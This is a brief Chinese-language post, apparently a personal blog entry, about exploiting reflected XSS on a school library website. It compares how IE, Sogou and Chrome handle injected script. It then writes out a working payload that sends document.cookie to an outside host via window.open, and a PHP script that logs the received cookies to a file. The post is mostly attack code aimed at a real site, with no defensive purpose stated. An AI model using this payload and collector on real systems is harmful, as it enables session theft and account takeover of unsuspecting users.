XSS之学校图书馆
1.不同的浏览器对js脚本的过滤措施不同,IE可以执行的,搜狗和Chrome提示Token contains reflects xss啥的
搜狗浏览器:
IE:
2.获取cookie
...............class=<script>window.open("http://www.cnblogs.com/1.php?cookie="+document.cookie)</script>解析:打开访问这个网址的窗口,并且通过msg传递一个变量这个变量就是cookie,IE把单引号标识为非法字符
在网站http://www.cnblogs.com/下的1.php接收cookie文件
<?php
$cookie=$_GET['cookie'];
$file=fopen('1.txt','a');
fwrite($file,$cookie);
fclose($file);
?>